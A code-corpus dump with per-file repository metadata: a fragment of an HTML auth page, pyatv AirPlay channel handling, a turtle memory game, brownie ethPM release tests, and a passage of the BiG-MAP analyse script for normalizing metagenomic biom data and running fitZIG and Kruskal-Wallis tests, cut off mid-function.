return [("<html lang='"+self.lang+"'><head><title>Authorization result</title><meta charset='utf-8'></head><body>"+self.failedMessage+"</body></html>").encode('utf-8')]
| 30.444444 | 174 | 0.722628 |
4a1e4ae4db84af55f455ef3dadbda5811961549a | 5,607 | py | Python | pyatv/protocols/airplay/channels.py | Jacobs4/pyatv | 52956adf3b79198be52cc03649f3ddeee19f9e6c | [
"MIT"
] | 532 | 2017-02-01T19:23:28.000Z | 2022-03-29T09:57:39.000Z | pyatv/protocols/airplay/channels.py | Jacobs4/pyatv | 52956adf3b79198be52cc03649f3ddeee19f9e6c | [
"MIT"
] | 1,639 | 2017-02-01T19:22:04.000Z | 2022-03-31T17:26:40.000Z | pyatv/protocols/airplay/channels.py | bdraco/pyatv | 9541d21e6101c60866d832626be97bf962774cd5 | [
"MIT"
] | 102 | 2017-02-02T01:42:13.000Z | 2022-02-26T08:49:34.000Z | """Logic related to logical AirPlay channels.
This module only deals with AirPlay 2 related channels right now.
"""
from abc import ABC
import logging
import plistlib
from random import randrange
from typing import Optional
from pyatv.auth.hap_channel import AbstractHAPChannel
from pyatv.protocols.mrp import protobuf
from pyatv.support.http import parse_request
from pyatv.support.packet import defpacket
from pyatv.support.variant import read_variant, write_variant
_LOGGER = logging.getLogger(__name__)
DATA_HEADER_PADDING = 0x00000000
DataHeader = defpacket(
"DataFrame", size="I", message_type="12s", command="4s", seqno="Q", padding="I"
)
class EventChannel(AbstractHAPChannel):
"""Connection used to handle the event channel."""
def handle_received(self) -> None:
"""Handle received data that was put in buffer."""
self.buffer: bytes
while self.buffer:
try:
request, self.buffer = parse_request(self.buffer)
if request is None:
_LOGGER.debug("Not enough data to parse request on event channel")
break
_LOGGER.debug("Got message on event channel: %s", request)
# Send a positive response to satisfy the other end of the channel
# TODO: Add public method to pyatv.http to format a message
headers = {
"Content-Length": 0,
"Audio-Latency": 0,
"Server": request.headers.get("Server"),
"CSeq": request.headers.get("CSeq"),
}
response = (
f"{request.protocol}/{request.version} 200 OK\r\n"
+ "\r\n".join(f"{key}: {value}" for key, value in headers.items())
+ "\r\n\r\n"
)
self.send(response.encode("utf-8"))
except Exception:
_LOGGER.exception("Failed to handle message on event channel")
class DataStreamListener(ABC):
"""Listener interface for DataStreamChannel."""
def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:
"""Handle incoming protobuf message."""
def handle_connection_lost(self, exc: Optional[Exception]) -> None:
"""Device connection was dropped."""
class DataStreamChannel(AbstractHAPChannel):
"""Connection used to handle the data stream channel."""
def __init__(self, output_key: bytes, input_key: bytes) -> None:
"""Initialize a new DataStreamChannel instance."""
super().__init__(output_key, input_key)
self.send_seqno = randrange(0x100000000, 0x1FFFFFFFF)
def connection_lost(self, exc: Optional[Exception]) -> None:
"""Device connection was dropped."""
self.listener.handle_connection_lost(exc)
def handle_received(self) -> None:
"""Handle received data that was put in buffer."""
self.buffer: bytes
while len(self.buffer) >= DataHeader.length:
header = DataHeader.decode(self.buffer, allow_excessive=True)
if len(self.buffer) < header.size:
_LOGGER.debug(
"Not enough data on data channel (has %d, expects %d)",
len(self.buffer),
header.size,
)
break
try:
self._process_message_from_buffer(header)
except Exception:
_LOGGER.exception("failed to process data frame")
self.buffer = self.buffer[header.size :]
def _process_message_from_buffer(self, header) -> None:
# Decode payload and process it
payload = plistlib.loads(self.buffer[DataHeader.length : header.size])
if payload:
self._process_payload(payload)
# If this was a request, send a reply to satisfy other end
if header.message_type.startswith(b"sync"):
self.send(
DataHeader.encode(
DataHeader.length,
b"rply" + 8 * b"\x00",
4 * b"\x00",
header.seqno,
DATA_HEADER_PADDING,
)
)
def _process_payload(self, message) -> None:
data = message.get("params", {}).get("data")
if data is None:
_LOGGER.debug("Got message with unsupported format: %s", message)
return
while data:
length, raw = read_variant(data)
if len(raw) < length:
_LOGGER.warning("Expected %d bytes, got %d", length, len(raw))
return
message = raw[:length]
data = raw[length:]
pb_msg = protobuf.ProtocolMessage()
pb_msg.ParseFromString(message)
self.listener.handle_protobuf(pb_msg)
def send_protobuf(self, message: protobuf.ProtocolMessage) -> None:
"""Serialize a protobuf message and send it to receiver."""
serialized_message = message.SerializeToString()
serialized_length = write_variant(len(serialized_message))
payload = plistlib.dumps(
{"params": {"data": serialized_length + serialized_message}},
fmt=plistlib.FMT_BINARY, # pylint: disable=no-member
)
self.send(
DataHeader.encode(
DataHeader.length + len(payload),
b"sync" + 8 * b"\x00",
b"comm",
self.send_seqno,
DATA_HEADER_PADDING,
)
+ payload
)
| 35.487342 | 86 | 0.582665 |
4a1e4b99343e69f8139d521978ee690c9bc50c23 | 1,975 | py | Python | Python/memory.py | RALE0/TC1001S.100-202211 | 5b7f1868729ca092bb3ec347e7eaca40d02976cb | [
"MIT"
] | null | null | null | Python/memory.py | RALE0/TC1001S.100-202211 | 5b7f1868729ca092bb3ec347e7eaca40d02976cb | [
"MIT"
] | null | null | null | Python/memory.py | RALE0/TC1001S.100-202211 | 5b7f1868729ca092bb3ec347e7eaca40d02976cb | [
"MIT"
] | 1 | 2022-03-25T00:09:14.000Z | 2022-03-25T00:09:14.000Z | """Memory, puzzle game of number pairs.
Exercises:
1. Count and print how many taps occur.
2. Decrease the number of tiles to a 4x4 grid.
3. Detect when all tiles are revealed.
4. Center single-digit tile.
5. Use letters instead of tiles.
"""
from random import *
from turtle import *
from freegames import path
"""
Contar y desplegar el numero de taps
"""
taps =0
car = path('car.gif')
tiles = list(range(32)) * 2
state = {'mark': None}
hide = [True] * 64
def square(x, y):
"Draw white square with black outline at (x, y)."
up()
goto(x, y)
down()
color('black', 'white')
begin_fill()
for count in range(4):
forward(50)
left(90)
end_fill()
def index(x, y):
"Convert (x, y) coordinates to tiles index."
return int((x + 200) // 50 + ((y + 200) // 50) * 8)
def xy(count):
"Convert tiles count to (x, y) coordinates."
return (count % 8) * 50 - 200, (count // 8) * 50 - 200
def tap(x, y):
"Update mark and hidden tiles based on tap."
spot = index(x, y)
mark = state['mark']
global taps
"Contar y desplegar el numero de taps"
if mark is None or mark == spot or tiles[mark] != tiles[spot]:
state['mark'] = spot
taps += 1
print(taps)
"""
Contar y desplegar el numero de taps
"""
else:
hide[spot] = False
hide[mark] = False
state['mark'] = None
def draw():
"Draw image and tiles."
clear()
goto(0, 0)
shape(car)
stamp()
for count in range(64):
if hide[count]:
x, y = xy(count)
square(x, y)
mark = state['mark']
if mark is not None and hide[mark]:
x, y = xy(mark)
up()
goto(x + 2, y)
color('black')
write(tiles[mark], font=('Arial', 30, 'normal'))
update()
ontimer(draw, 100)
shuffle(tiles)
setup(420, 420, 370, 0)
addshape(car)
hideturtle()
tracer(False)
onscreenclick(tap)
draw()
done()
| 19.949495 | 66 | 0.567089 |
4a1e4dfac54e64272a2e2d8d84e7f7381649cbf0 | 2,606 | py | Python | tests/cli/test_cli_ethpm_release.py | ETCCooperative/brownie | 72701c0810058c769412294d4d557af52c9d9932 | [
"MIT"
] | null | null | null | tests/cli/test_cli_ethpm_release.py | ETCCooperative/brownie | 72701c0810058c769412294d4d557af52c9d9932 | [
"MIT"
] | null | null | null | tests/cli/test_cli_ethpm_release.py | ETCCooperative/brownie | 72701c0810058c769412294d4d557af52c9d9932 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import json
import pytest
from brownie._cli import ethpm as cli_ethpm
from brownie.exceptions import UnknownAccount
from brownie.project import ethpm
ETHPM_CONFIG = {
"package_name": "testpackage",
"version": "1.0.0",
"settings": {"deployment_networks": False, "include_dependencies": False},
}
@pytest.fixture
def registry(ipfs_mock, testproject, accounts, monkeypatch):
monkeypatch.setattr("brownie._cli.ethpm.network.connect", lambda k: True)
with testproject._path.joinpath("ethpm-config.yaml").open("w") as fp:
json.dump(ETHPM_CONFIG, fp)
yield testproject.PackageRegistry.deploy({"from": accounts[0]})
@pytest.fixture(autouse=True)
def mocker_spy(mocker):
mocker.spy(ethpm, "create_manifest")
mocker.spy(ethpm, "verify_manifest")
mocker.spy(ethpm, "release_package")
def test_release_localaccount(registry, accounts, tp_path, monkeypatch, tmpdir):
monkeypatch.setattr("brownie.network.account.getpass", lambda x: "")
a = accounts.add()
a.save(tmpdir + "/release_tester.json")
accounts[0].transfer(a, "1 ether")
accounts._reset()
cli_ethpm._release(tp_path, registry.address, tmpdir + "/release_tester.json")
assert ethpm.create_manifest.call_count == 1
assert ethpm.verify_manifest.call_count == 1
assert ethpm.release_package.call_count == 1
id_ = registry.getReleaseId("testpackage", "1.0.0")
assert registry.getReleaseData(id_)[-1] == ethpm.create_manifest.return_value[1]
def test_release_account(registry, accounts, tp_path):
cli_ethpm._release(tp_path, registry.address, accounts[0].address)
assert ethpm.create_manifest.call_count == 1
assert ethpm.verify_manifest.call_count == 1
assert ethpm.release_package.call_count == 1
id_ = registry.getReleaseId("testpackage", "1.0.0")
assert registry.getReleaseData(id_)[-1] == ethpm.create_manifest.return_value[1]
def test_release_unknown_account(registry, accounts, tp_path):
with pytest.raises(UnknownAccount):
cli_ethpm._release(tp_path, registry.address, "0x2a8638962741B4fA728983A6C0F57080522aa73a")
def raise_exception(e):
raise e
def test_exceptions(registry, accounts, tp_path, monkeypatch):
monkeypatch.setattr(
"brownie.project.ethpm.release_package",
lambda registry_address, account, package_name, version, uri: raise_exception(
Exception("foobar")
),
)
cli_ethpm._release(tp_path, registry.address, accounts[0].address)
assert ethpm.create_manifest.call_count == 1
assert ethpm.verify_manifest.call_count == 0
| 32.987342 | 99 | 0.734459 |
4a1e4e32758d82fc47be67fa4fded8b1d2e59097 | 49,837 | py | Python | src/BiG-MAP.analyse.py | medema-group/BiG-MAP | 5a11f63e9484c25e254ccfd2dc96cbbf79f0f9e0 | [
"MIT"
] | 12 | 2020-05-06T14:42:08.000Z | 2022-02-18T15:19:16.000Z | src/BiG-MAP.analyse.py | medema-group/BiG-MAP | 5a11f63e9484c25e254ccfd2dc96cbbf79f0f9e0 | [
"MIT"
] | 13 | 2020-11-02T15:47:51.000Z | 2022-02-06T12:10:03.000Z | src/BiG-MAP.analyse.py | medema-group/BiG-MAP | 5a11f63e9484c25e254ccfd2dc96cbbf79f0f9e0 | [
"MIT"
] | 5 | 2020-03-03T14:33:27.000Z | 2021-09-29T10:22:04.000Z | #!/usr/bin/env python3
"""
--------------- Analyse module ---------------
Authors: Hannah Augustijn, Koen van den Berg, Victoria Pascal Andreu
University: Wageningen University and Research
Department: Department of Bioinformatics
Date: 09/03/2020
----------------------------------------------
This script performs a statistical analysis of the
metagenomic/metatranscriptomic samples. First, the script
normalizes and filters the data. Next, the best covered gene
clusters can be observed and the Kruskal Wallis and fitZIG model
will be used to compute differentially abundant/expressed gene clusters.
Benjamini-Hochberg FDR compensates for multiple hypothesis testing.
The output of the script are heatmaps in pdf format.
"""
# Import statements:
import os.path
import subprocess
import sys
import argparse
import re
import shutil
import json
import pandas as pd
import numpy as np
from scipy.stats import mstats
from statsmodels.stats.multitest import fdrcorrection
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from rpy2.robjects.packages import importr, STAP
import rpy2.robjects.packages as rpackages
######################################################################
# Argparse functionality
######################################################################
def get_arguments():
"""Parsing the arguments"""
parser = argparse.ArgumentParser(description="",
usage='''
______________________________________________________________________
BiG-MAP analyse: analyse the biom-outputs (ZIG/Kruskal-Wallis)
______________________________________________________________________
Generic command: python3 BiG-MAP.analyse.py --explore --compare
-B [biom_file] -T [SampleType] -M [meta_group] -O [outdir] [options*]
Tests the present biom file using either a fitZIG model or a
Kruskal-Wallis model.
Obligatory arguments:
-B Provide the Biom file here
-T Metagenomic/metatranscriptomic
-M provide the metagroup here. This is the first column in the
options output. Examples: DiseaseStatus, Longitude, etc...
-O Put path to the output folder where the results should be
deposited. Default = current folder (.)
--explore Explore the best covered gene clusters.
-t Optional argument for -explore: adjust the
amount of displayed gene clusters. Default = 20.
-fe File name for explore heatmap. Default = explore_heatmap.
--compare Make a comparison between two groups using fitZIG and Kruskal-Wallis.
-g Space separated list of 2 groups that are to be compared.
Example: UC and Control --> UC Control.
-af Alpha value to determine significance of the fitZIG model. Default=0.05.
-ak Alpha value to determine significance of the Kruskal Wallis model. Default=0.05.
-fc Output file names for Kruskal Wallis and fitZIG heatmaps. Input first the
name for Kruskal Wallis, then for fitZIG. Example: map1_kruskall map2_fitZIG.
Default = [group1]vs[group2]_[kw/fz].
_____________________________________________________________
''')
parser.add_argument("-B", "--biom_file",
help=argparse.SUPPRESS, required=True)
parser.add_argument("-T", "--sample_type",
help=argparse.SUPPRESS, type=str.upper,
required=True, choices=['METAGENOMIC', 'METATRANSCRIPTOMIC'])
parser.add_argument("-M", "--metagroup",
help=argparse.SUPPRESS, type=str, required=True)
parser.add_argument("-c", "--compare", action='store_true', help=argparse.SUPPRESS,
required=False)
parser.add_argument("-e", "--explore", action='store_true', help=argparse.SUPPRESS,
required=False)
parser.add_argument("-g", "--groups", help=argparse.SUPPRESS,
type=str, nargs='+', required=False)
parser.add_argument("-t", "--threshold", help=argparse.SUPPRESS,
type=int, default=20, required=False)
parser.add_argument("-af", "--alpha_fitzig", help=argparse.SUPPRESS,
type=float, default=0.05, required=False)
parser.add_argument("-ak", "--alpha_kruskal", help=argparse.SUPPRESS,
type=float, default=0.05, required=False)
parser.add_argument("-O", "--outdir", help=argparse.SUPPRESS,
required=True)
parser.add_argument("-fe", "--file_name_explore", help=argparse.SUPPRESS,
required=False)
parser.add_argument("-fc", "--file_names_compare", help=argparse.SUPPRESS,
type=str, nargs='+', required=False)
return parser.parse_args()
######################################################################
# CONVERT BIOM
######################################################################
def export2biom(biom_file, outdir):
"""Converts biom input file to json dictionary file
parameters
----------
biom_file
string, path to biom file
outdir
string, path to output directory
returns
----------
json_file = the created json-format file
"""
json_file = os.path.join(outdir, "BiG-MAP.table.txt")
cmd_export2biom = f"biom convert -i {biom_file} -o {json_file} \
--table-type='Pathway table' --to-json"
res_export = subprocess.check_output(cmd_export2biom, shell=True)
return json_file
def get_sample_type(sample_type, json_file, metagroup):
"""Parses the biom file to extract the sample information belonging
to the inputted sample type (metagenomic/metatranscriptomic).
----------
sample_type
string, name of the sample type: metagenomic/metatranscriptomic.
json_file
dict, biom file converted to a dictionary format
metagroup
string, name of the metagroup
returns
----------
index_samples = dict, {index of sample: sample id}
list_samples = list, all of sample names belonging to the metagroup
metadata = dict, {sample id: metadata}
"""
index_samples = {}
metadata = {}
list_samples = []
for sample in json_file["columns"]:
if type(sample["metadata"]) == type(None):
print("The metadata in the BIOM file is missing. \
Please check the input metadata and filenames for BiG-MAP.map and the resulting BIOM file.")
sys.exit()
else:
if sample["metadata"] == {}:
pass
elif sample_type == (sample["metadata"]["SampleType"]).upper():
list_samples.append(sample["id"])
index = json_file["columns"].index(sample)
index_samples[index] = sample
metadata[sample["id"]] = sample["metadata"][metagroup]
return(index_samples, list_samples, metadata)
def filter_rows(json_file, sample_index):
"""
Removes rows which don't have at least the amount of positives of
the cutoff
----------
json_file
dict, biom file converted to a dictionary format
sample_index
dict, index of samples and sample ids
returns
----------
out_list = list, indexes which are above the cut-off
"""
counts = 0
index_number = 0
com = []
dict_counts = {}
tot_hits = []
out_list = []
gc_ids = []
# Cut-off such that 25% of the samples have a hit
cutoff = int((len(sample_index.keys()))*0.25)
# Determines the amount of hits for a GC
for data_index in json_file["data"]:
for key in sample_index.keys():
if data_index[1] == key:
if data_index[0] not in com:
com.append(data_index[0])
counts = 0
dict_counts[data_index[0]] = 0
if data_index[0] in com:
counts += 1
dict_counts[data_index[0]] = counts
# Compares the total amount of hits for a GC with the cut-off
for ids in json_file["rows"]:
if ids["id"] not in gc_ids:
gc_ids.append(ids["id"])
for ids2 in gc_ids:
for key in dict_counts.keys():
if "HG_" in ids2 and key not in tot_hits:
if key == index_number:
tot_hits.append(key)
else:
if dict_counts[key] >= cutoff and key not in tot_hits:
tot_hits.append(key)
index_number += 1
# Create list containing the data above the cut-off
for data_index in json_file["data"]:
for index_no in tot_hits:
if index_no == data_index[0]:
out_list.append(data_index)
return out_list
def get_gc_ids(json_file, index_list, index_samples):
""" Get the GC names and RPKM values from the filtered indexes
----------
json_file
dict, biom file converted to a dictionary format
index_list
list, list of the indexes above the threshold
index_samples:
dict, all the indexes with corresponding GC names
returns
----------
out_dict = dict, {GC_ids: RPKM values}
"""
out_dict = {}
rpkm_values = []
sample_index = []
gc_ids = []
index_number = 0
for ids in json_file["rows"]:
if ids["id"] not in gc_ids:
gc_ids.append(ids["id"])
# filtered index numbers of the samples
s_ids = index_samples.keys()
for ids in json_file["rows"]:
for index in index_list:
# filter index lists by selecting present sample index numbers
if index[0] == index_number and index[1] in s_ids:
rpkm_values.append(index[2])
sample_index.append(index[1])
out_dict[gc_ids[index[0]]] = rpkm_values
# add zero's for missing values
if sample_index == []:
pass
else:
mis_index = set(list(index_samples.keys())).difference(sample_index)
for indx in mis_index:
rpkm_values.insert((indx-list(index_samples.keys())[0]), 0.0)
rpkm_values = []
sample_index = []
index_number += 1
return out_dict
def make_dataframe(gc_ids, sample_ids):
""" makes a pandas dataframe
----------
GC_ids
dict, GC names as keys and ints as values
sample_ids
list, names of the sample ids
returns
----------
df = pandas dataframe
"""
df = (pd.DataFrame(gc_ids, index=sample_ids)).T
return df
def norm_log2_data(df):
"""Normalization and log2 convertion as performed by metagenomeseq
----------
df
dataframe, rows with samples, columns with GC and RPKM values
returns
----------
norm_df = dataframe with normalized and log2 converted RPKM values
"""
norm_df = pd.DataFrame()
df_adj = df.replace(0, np.nan)
quantile_dict = (df_adj.quantile(axis=0)).to_dict() # calculate the quantile
# determine the numeric values in the dataframe
numeric_cols = [col for col in df_adj if df_adj[col].dtype.kind != 'O']
df_adj[numeric_cols] -= np.finfo(float).eps # substract the machine epsilon
# calculate the normalization factor by taking the sum of the values below the quantile \
# normalize the data by dividing the counts by the normalization factor
for sample in quantile_dict.keys():
normfac = df_adj[sample][df_adj[sample] <= quantile_dict[sample]].sum()
norm_df = norm_df.append(df_adj[sample]/(normfac/1000))
norm_df = norm_df.T
norm_df[numeric_cols] += 1 # add 1 as correction for log2 calc
norm_df = (np.log2(norm_df)).replace(np.nan, 0.0) # calculate log2
return norm_df
def get_coverage(biom_dict, sample_list, gc_names):
""" get coverage scores from the biom file
----------
biom_dict
dict, biom file converted to a dictionary format
sample_list
list, ids of all the relevant samples
gc_names
list, names of all the relevant GCs
returns
---------
out_dict = dict {GC name: [coverage scores]}
"""
out_dict = {}
list_samples = []
list_values = []
for ids in biom_dict["rows"]:
if ids["id"] in gc_names:
for sample_name in ids["metadata"].keys():
if sample_name in sample_list and sample_name not in list_samples:
list_samples.append(sample_name)
list_values.append(float(ids["metadata"][sample_name]))
out_dict[ids["id"]] = list_values
list_samples = []
list_values = []
return out_dict
def best_cov(cov_df, df, display):
""" determines the best covered GCs
---------
cov_df
dataframe, GC names as index and coverage scores as values
df
dataframe, dataframe with RPKM scores as values
display
int, the amount of displayable GC. Default = 20
returns
---------
sign_GC = dataframe, filtered on the highest cov scores
sign_cov = dataframe, filtered coverage dataframe on the display amount
"""
cov_mean = cov_df.mean(axis=1)
cov_mean = cov_mean.nlargest(display)
sign_gc = df[df.index.isin(list(cov_mean.index))]
sign_cov = cov_df[cov_df.index.isin(list(cov_mean.index))]
return sign_gc, sign_cov
def get_relevant_hg(sign_gc, df):
""" extract the relevant housekeeping genes
---------
sign_GC
dataframe, filtered dataframe of GCs and RPKM values
df
dataframe, GC as index, sample IDs as columns and RPKM values
returns
---------
function_names = list, function desciptions of organisms
sign_hg = list, full names of the relevant HGs
id_list = list, GC and HG ids
"""
id_list = []
name_list = []
sign_hg = []
function_names = []
index_list = list(sign_gc.index)
index_full = list(df.index)
for gc_name in index_list:
name_list.append(gc_name.split("--OS=")[1].split("--SMASHregion=")[0])
id_list.append(gc_name.split("|")[1].split(".")[0])
# make a list of all the relevant HGs
for id_name in name_list:
for full_names in index_full:
if id_name in full_names and "HG_" in full_names:
sign_hg.append(full_names)
# get the function from the HG name
for hg_name in sign_hg:
function = hg_name.split("Entryname=")[1].split("--OS=")[0]
if function not in function_names:
function_names.append(function)
return(function_names, sign_hg, name_list)
def make_hg_df(function_names, sign_hg, id_list, df, groups="", metadata=""):
""" create a dataframe of HG as index and functions as colums with values as means
---------
function_names
list, function desciptions of organisms
sign_hg
list, full names of the relevant HGs
id_list
list, GC and HG ids
df
dataframe, GC as index, sample IDs as columns and RPKM values
groups
list, inputted groups, for instance: [UC, CD]
metadata
dict, {sample id: metadata}
returns
--------
relevant_hg = dataframe, index HG names, values RPKMs
mean_df = dataframe, mean RPKM values of the HGs
"""
if groups != "":
row = pd.Series(metadata, name="Metadata")
df = df.append(row).sort_values(by=["Metadata"], axis=1)
df = df.replace(0, float(0.0)).T
df = df.loc[df["Metadata"].isin(groups)].T
df = df.drop(["Metadata"], axis=0)
means_dict = ((df[df.index.isin(sign_hg)]).mean(axis=1)).to_dict()
for gc_name in means_dict.keys():
for function in function_names:
for ids in id_list:
if function in gc_name and ids in gc_name:
if type(means_dict[gc_name]) == type(id_list):
means_dict[gc_name] = means_dict[gc_name]
else:
means_dict[gc_name] = [means_dict[gc_name]]
means_dict[gc_name].append(function)
means_dict[gc_name].append(ids)
mean_df = (pd.DataFrame(means_dict, index=["Mean", "Function", "ID"])).T
mean_df = mean_df.pivot(index='ID', columns='Function', values='Mean')
return mean_df
def sort_coverage(gc_df, cov, metadata):
""" sort the GCs on coverage from high to low and adds metadata
--------
gc_df
dataframe, filtered GC dataframe with RPKM values
coverage
dataframe, filtered coverage scores
metadata
dict, {sample id: metadata}
returns
--------
GC = dataframe, sorted on coverage score
meta_types = list, names of the metadata groups for each column
"""
cov_mean = cov.mean(axis=1)
gc_df = pd.concat([gc_df, cov_mean], axis=1, sort=True)
gc_df = (gc_df.sort_values(by=[0], ascending=False)).drop([0], axis=1)
# add metadata and sort on the groups
row = pd.Series(metadata, name="Metadata")
gc_df = gc_df.append(row).sort_values(by=["Metadata"], axis=1)
meta_types = list(gc_df.loc["Metadata", :].values)
gc_df = gc_df.drop(["Metadata"], axis=0)
gc_df = gc_df.replace(0, float(0.0))
return gc_df, meta_types
def sort_housekeeping(gc_df, hg_df, cov):
""" Sorts HG on coverage and appends zeros for missing values
--------
gc_df
dataframe, filtered GC dataframe with RPKM values
hg_df
dataframe, filtered HG dataframe with RPKM values
coverage
dataframe, filtered coverage scores
returns
--------
HG_new = dataframe, sorted on coverage score
"""
index_list = []
sort_id = {}
# add zero's for non existing HG
index_names = list(gc_df.index)
for index in index_names:
index_list.append(index.split("--OS=")[1].split("--SMASHregion=")[0])
hg_df = hg_df.replace(np.nan, 0.0)
index_hg = list(hg_df.index)
column_hg = len(list(hg_df.columns))
cov_index = list(cov.index)
for id_gc in index_list:
if id_gc not in index_hg:
hg_df.loc[id_gc] = [0] * column_hg
# sort the HGs on coverage from high to low
for cov_id in cov_index:
for id_gc in index_list:
if id_gc in cov_id:
sort_id[id_gc] = cov_id
df_new = hg_df.rename(index=sort_id)
cov_mean = cov.mean(axis=1)
hg_new = pd.concat([df_new, cov_mean], axis=1, sort=True)
hg_new = (hg_new.sort_values(by=[0], ascending=False)).drop([0], axis=1)
return hg_new
######################################################################
# FITZIG MODEL
######################################################################
def run_fit_zig(biomfile, groups, data_group, biom_dict, outdir):
""" run metagenomeSeq fitZIG model using an R function and Rpy2
--------
biomfile
string, path to the biomfile
groups
list, names of the inputted groups
data_type
string, either metagenomic or metatranscriptomic
data_group
string, name of of the groups. For instance: DiseaseStatus
returns
--------
fitzig_out = R dataframe containing the fitzig results
"""
# import and install R packages
base = importr('base')
utils = importr('utils')
utils = rpackages.importr('utils')
packnames = ('biomformat', 'metagenomeSeq')
dict_length = 0
for sample in biom_dict["columns"]:
if sample["metadata"] == {}:
mock_dict = {}
out_list =[]
new_biom_file = os.path.join(outdir + "/BiG-MAP.adj.biom")
with open (biomfile, "r") as biom:
for line in biom:
if "{}" in line:
for i in range(dict_length):
mock_dict[str(i)] = "NA"
mock_dict_out = json.dumps(mock_dict)
new_line = f' "metadata": {mock_dict_out}\n'
out_list.append(new_line)
else:
out_list.append(line)
with open (new_biom_file, "w") as nw_biom:
for line in out_list:
nw_biom.write(line)
pass
else:
dict_length = len(sample["metadata"])
data_type = sample["metadata"]["SampleType"]
names_to_install = [x for x in packnames if not rpackages.isinstalled(x)]
if len(names_to_install) > 0:
for i in names_to_install:
utils.install_packages(i, repos="http://cran.rstudio.com/")
metagenomeseq = importr('metagenomeSeq')
biomformat = importr('biomformat')
r_command = ('''
run_fitZIG <- function(path, group1, group2, datatype, datagroup){
### load and filter the biom file for the inputted groups and data types
MR <- loadBiom(path)
MR_sample <- MR[,which(pData(MR)$SampleType==datatype)]
cut_off <- floor(length(colnames(MRcounts(MR_sample, norm=F, log=T)))*0.25)
MR_sample <- filterData(MR_sample, present = cut_off)
MR_mod <- MR_sample[,which(pData(MR_sample)[datagroup]==group1 | \
pData(MR_sample)[datagroup] == group2)]
d1 <- pData(MR_mod)[datagroup][,1]
### calculate the normalization factor
normFactor <- calcNormFactors(obj=MR_mod,p=0.5)
normFactor <- log2(normFactor/median(normFactor$normFactors) + 1)
mod <- model.matrix(~d1 + normFactor$normFactors)
pData(MR_mod@expSummary$expSummary)$normFactors = normFactor
### run the fitZIG model
fit <- fitZig(obj = MR_mod, mod = mod, useCSSoffset = F)
### perform FDR correction
MR_coefs <- MRcoefs(fit, by=2, number = length(d1), group = 2, \
adjustMethod = "BH", alpha = 0,01, taxa = fit@taxa)
MR_coefs$clust_name = rownames(MR_coefs)
return(MR_coefs)
}
''')
# call the R function
r_pkg = STAP(r_command, "r_pkg")
biom_check = os.path.join(outdir + "/BiG-MAP.adj.biom")
if os.path.exists(biom_check):
try:
fitzig_out = r_pkg.run_fitZIG(biom_check, groups[0], groups[1], data_type, data_group)
os.remove(os.path.join(outdir + "/BiG-MAP.adj.biom"))
except subprocess.CalledProcessError:
print("There has been an error in the R-script, please check the input (meta)data")
sys.exit()
else:
try:
fitzig_out = r_pkg.run_fitZIG(biomfile, groups[0], groups[1], data_type, data_group)
except subprocess.CalledProcessError:
print("There has been an error in the R-script, please check the input (meta)data")
sys.exit()
return fitzig_out
######################################################################
# KRUSKAL WALLIS
######################################################################
def kruskal_wallis(norm_df, metadata, groups):
""" performes the kruskal wallis test and corrects the obtained p-values
using Benjamini Hochberg FDR correction
--------
norm_df
dataframe, normalized GCs
metadata
dict, {sample id: metadata}
groups
list, names of the inputted groups
returns
--------
fdr_df = dataframe, contains the adjusted P-values for the GCs
"""
gc_groups = {}
p_values = []
group1 = groups[0]
group2 = groups[1]
row = pd.Series(metadata, name="Metadata")
df = norm_df.append(row).sort_values(by=["Metadata"], axis=1)
df = df.replace(0, float(0.0)).T
df = df.loc[df["Metadata"].isin(groups)]
counts = df["Metadata"].value_counts()
if len(counts[counts>=3].index) != 2:
print("Not enough samples detected to perform a differentially \
expression analysis. Please provide at least 3 samples for each group")
sys.exit()
for gc_name in df.columns:
if "GC_DNA--" in gc_name: # filter out the housekeeping genes
gc_groups[gc_name] = {}
for grp in df['Metadata'].unique():
# make arrays of the groups per GC {GC: {group1: array, group2: array}}
gc_groups[gc_name][grp] = df[gc_name][df['Metadata'] == grp].values
# perform Kruskal Wallis test
for gc in gc_groups.keys():
no, pval = mstats.kruskalwallis(gc_groups[gc][group1], gc_groups[gc][group2])
p_values.append(pval)
fdr = fdrcorrection(p_values, alpha=0.05, method="i")
fdr_df = pd.DataFrame(data=fdr, columns=gc_groups.keys(), index=["T/F", "pval"]).T
return fdr_df
######################################################################
# STRUCTURE RESULTS
######################################################################
def parse_results(results, all_counts, groups, metadata, alpha, res_type):
""" parse the output results of the fitZIG or Kruskal Wallis model
--------
results
dataframe, R or pandas structured dataframe
all_counts
dict, normalized GCs and RPKM values
groups
list, names of the groups
metadata
dict, {sample id: metadata}
alpha
float, value to determine significance
res_type
string, either fitzig or kruskal
returns
--------
counts = dataframe containing the significant counts according to fitzig
meta_types = list of metagroups
"""
meta_types = []
counts = []
if res_type == "fitzig":
gc_names = list(results[3])
adj_pvals = list(results[2])
else:
gc_names = results.index
adj_pvals = list(results["pval"])
df = pd.DataFrame(adj_pvals, index=gc_names, columns=["Adj p-values"])
df = df[df.index.str.contains("GC_DNA--")]
df = df[df["Adj p-values"] < alpha]
sign_gc = list(df.index)
if sign_gc == [] and res_type == "fitzig":
print("There are no significant gene clusters found. Try increasing the alpha (-af flag)")
sys.exit()
elif sign_gc == [] and res_type == "kruskal":
print("There are no significant gene clusters found. Try increasing the alpha (-ak flag)")
else:
row = pd.Series(metadata, name="Metadata")
counts = all_counts.append(row).sort_values(by=["Metadata"], axis=1)
counts = counts.replace(0, float(0.0)).T
counts = counts.loc[counts["Metadata"].isin(groups)].T
meta_types = list(counts.loc["Metadata", :].values)
counts = counts.drop(["Metadata"], axis=0)
counts = counts[all_counts.index.isin(sign_gc)]
return counts, meta_types
def order_coverage(metadata, cov, groups):
""" order the coverage scores on the metadata
--------
metadata
dict, {sample id: metadata}
cov
dataframe, relavant coverage scores
returns
--------
cov = dataframe, filtered coverage dict on the metadata
"""
group_meta = {}
for sample_id in metadata.keys():
if metadata[sample_id] in groups:
group_meta[sample_id] = metadata[sample_id]
row = pd.Series(group_meta, name="Metadata")
cov = cov.append(row).sort_values(by=["Metadata"], axis=1).T
cov = cov.replace(0, float(0.0))
cov = cov.groupby(["Metadata"]).mean().T
return cov, group_meta
def get_log2fold(gc_df, groups, group_meta):
""" calculate the log2 fold change
--------
gc_df
dataframe, relevant GCs
groups
list, inputted groups
returns
--------
log_fold = dataframe, log2 fold change of the relevant GCs
"""
groups = sorted(groups)
group1 = groups[0]
group2 = groups[1]
